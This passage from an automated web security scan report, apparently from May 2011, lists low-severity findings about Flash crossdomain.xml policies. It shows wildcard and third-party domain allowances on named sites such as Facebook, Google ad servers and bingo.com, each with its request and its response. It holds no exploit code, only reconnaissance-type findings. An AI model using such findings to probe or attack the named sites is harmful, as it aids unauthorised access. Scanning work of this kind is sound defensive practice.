P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=47
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
    <allow-access-from domain="m.doubleclick.net"/>
    <allow-access-from domain="*.dowjonesonline.com"/>
    <allow-access-from domain="www.dowjonesonline.com"/>
    <allow-access-from domain="a.marketwatch.com"/>
    <allow-access-from domain="*.marketwatch.com"/>
    <allow-access-from domain="www.akamai.com"/>
    <allow-access-from domain="*.akamai.com"/>
    <allow-access-from domain="www.wsj.com"/>
    <allow-access-from domain="*.wsj.com"/>
    <allow-access-from domain="s.dev.wsj.com"/>
    <allow-access-from domain="idev.online.wsj.com"/>
    <allow-access-from domain="s.wsjsat.dowjones.net"/>
    <allow-access-from domain="s.s.dev.wsj.com"/>
<allow-access-from domain="reno.wsjqa.dowjones.net"/>
    <allow-access-from domain="*.online.wsj.com"/>
...[SNIP]...
<allow-access-from domain="quotes.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="public.wsj.com"/>
    <allow-access-from domain="*.public.wsj.com"/>
<allow-access-from domain="www.barrons.com"/>
    <allow-access-from domain="*.barrons.com"/>
...[SNIP]...
<allow-access-from domain="idev.online.barrons.com"/>
    <allow-access-from domain="*.online.barrons.com"/>
    <allow-access-from domain="online.barrons.com"/>
    <allow-access-from domain="public.barrons.com"/>
    <allow-access-from domain="*.public.barrons.com"/>
    <allow-access-from domain="*.aol.com"/>
    <allow-access-from domain="*.brightcove.com"/>
    <allow-access-from domain="creatives.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="wsjdigital.com"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.piclens.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dowjones.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="online.s.dev.wsj.com"/>
    <allow-access-from domain="quotes.s.dev.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="polls.s.dev.wsj.com"/>
<allow-access-from domain="blogs.s.dev.wsj.com"/>
<allow-access-from domain="triplewebdesign.com"/>
<allow-access-from domain="ingyournumber.com"/>
   <allow-access-from domain="*.ingyournumber.com"/>
<allow-access-from domain="*.issuu.com"/>
   <allow-access-from domain="static.issuu.com"/>
    <allow-access-from domain="professional.s.dev.wsj.com"/>
    <allow-access-from domain="*.dartmotif.com"/>
    <allow-access-from domain="wsjradio.com"/>
    <allow-access-from domain="*.wsjradio.com"/>
    <allow-access-from domain="www.wsjradio.com"/>
    <allow-access-from domain="*.eyereturn.com"/>
<allow-access-from domain="fxtrader.l.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.f.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.s.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.dowjones.com"/>
    <allow-access-from domain="dowjones.visualla.com"/>
...[SNIP]...

8.84. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 01 May 2011 20:07:48 GMT
Expires: Mon, 02 May 2011 20:07:48 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 21059

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

8.85. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 01 May 2011 03:22:47 GMT
Expires: Mon, 02 May 2011 03:22:47 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 81321
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

8.86. http://s28.sitemeter.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: s28.sitemeter.com

Response

HTTP/1.1 200 OK
Content-Length: 219
Content-Type: text/xml
Last-Modified: Wed, 25 Oct 2006 21:31:00 GMT
Accept-Ranges: bytes
ETag: "025bdd7cf8c61:83fd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 01:56:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sitemeter.com" />
</cro
...[SNIP]...

8.87. http://static.ak.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Sun, 01 May 2011 23:34:44 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

8.88. http://tomopop.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tomopop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: tomopop.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "2983888878"
Last-Modified: Wed, 19 May 2010 22:15:37 GMT
Content-Length: 215
Connection: close
Date: Mon, 02 May 2011 02:03:31 GMT
Server: lighttpd/1.4.28

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" />
</cross
...[SNIP]...

8.89. http://www.admez.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.admez.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.admez.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:02 GMT
Server: Apache
Last-Modified: Wed, 07 Jul 2010 11:45:11 GMT
ETag: "cf6f56-129-48acab3c67fc0"
Accept-Ranges: bytes
Content-Length: 297
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="admez.com" />
   <allow-access-from domain="*.admez.com" />
   <allow-access-from domain="localhost" />
...[SNIP]...

8.90. http://www.anilinkz.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.anilinkz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.anilinkz.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:34 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 20:59:21 GMT
ETag: "398000a-101-48f24dae6dc40"
Accept-Ranges: bytes
Content-Length: 257
Cache-Control: max-age=604800, public, must-revalidate
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.anilinkz.com"/>
<allow-access-from domain="*.aniforums.com"/>
...[SNIP]...

8.91. http://www.awltovhc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.awltovhc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.awltovhc.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Mon, 02 May 2011 02:19:10 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

8.92. http://www.bingo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bingo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bingo.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 00:18:03 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Mon, 10 May 2010 15:23:30 GMT
Accept-Ranges: bytes
Content-Length: 2050
Cache-Control: max-age=2592000
Expires: Wed, 01 Jun 2011 00:01:36 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.amorbingo.com" secure="true" />

...[SNIP]...
<allow-access-from domain="*.bettybingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.bingo.se" secure="true" />
...[SNIP]...
<allow-access-from domain="*.caratbingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.caratcasino.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cupidocasino.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fruitybingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.kroonikabingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.be" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariacasino.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariacasino.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariacasino.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariapoker.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.oliviabingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.oliviabingo.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="*.oliviacasino.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.parabolgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.seiska.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unibetbingo.se" secure="true" />
...[SNIP]...
<allow-access-from domain="*.violetbingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.violetcasino.com" secure="true" />
...[SNIP]...
<allow-access-from domain="unicdn.hs.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="adserving.unibet.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.goorps.com" secure="false" />
...[SNIP]...

8.93. http://www.chrisbrownworld.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chrisbrownworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chrisbrownworld.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Mar 2011 18:37:37 GMT
ETag: "300517-2d0-49f52e3555e40"
Accept-Ranges: bytes
Content-Length: 720
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
P3P: CP=HONK
Connection: close
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sonymusic.com" />
<allow-access-from domain="sonymusic.com" />
<allow-access-from domain="*.columbiarecords.com" />
<allow-access-from domain="columbiarecords.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.google-analytics.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="windows.dev.boffswana.com.au" />
<allow-access-from domain="*.britneyvideogame.com" />
<allow-access-from domain="femmefatale.britney.com" />
...[SNIP]...

8.94. http://www.cosmeticscop.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cosmeticscop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cosmeticscop.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 02 Jun 2010 16:17:10 GMT
Accept-Ranges: bytes
ETag: "d6a3f8d6f2cb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.cosmeticscop.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=4cec805f-42ac-463d-a51f-5457eebc586a; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:45 GMT
Connection: close
Content-Length: 470

<cross-domain-policy>
<allow-access-from domain="www.paulaschoice.com" />
<allow-access-from domain="paulaschoice.com" />
<allow-access-from domain="paulaschoice.commercev3.com" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="doubleclick.net" />
<allow-access-from domain="*.totalbeauty.com" />
<allow-access-from domain="totalbeauty.com" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

8.95. http://www.dotmed.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dotmed.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dotmed.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:17 GMT
Server: Apache
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.dotmed.com"/>
<allow-access-from domain="dotmed-images.s3.amazonaws.com"/>
...[SNIP]...

8.96. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.135.49
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

8.97. http://www.ftjcfx.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftjcfx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftjcfx.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Mon, 02 May 2011 02:19:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

8.98. http://www.kens5.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
